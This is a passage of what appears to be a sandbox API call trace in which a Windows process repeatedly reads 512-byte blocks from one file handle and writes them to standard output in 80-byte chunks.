WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] GetFileType (hFile=0x50) returned 0x1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.939] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.939] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] GetFileType (hFile=0x50) returned 0x1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] GetFileType (hFile=0x50) returned 0x1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] GetFileType (hFile=0x50) returned 0x1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] GetFileType (hFile=0x50) returned 0x1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.940] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.940] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] GetFileType (hFile=0x50) returned 0x1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.940] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.940] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.941] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.941] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.941] GetFileType (hFile=0x50) returned 0x1 [0202.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.942] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.942] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] GetFileType (hFile=0x50) returned 0x1 [0202.942] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.942] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] GetFileType (hFile=0x50) returned 0x1 [0202.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.943] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.944] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.944] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.944] GetFileType (hFile=0x50) returned 0x1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.945] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.945] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.945] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] GetFileType (hFile=0x50) returned 0x1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] GetFileType (hFile=0x50) returned 0x1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] GetFileType (hFile=0x50) returned 0x1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.945] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.945] GetFileType (hFile=0x50) returned 0x1 [0202.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.947] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.947] GetFileType (hFile=0x50) returned 0x1 [0202.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.947] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.948] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.948] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] GetFileType (hFile=0x50) returned 0x1 [0202.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.948] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] GetFileType (hFile=0x50) returned 0x1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] GetFileType (hFile=0x50) returned 0x1 [0202.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.949] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, 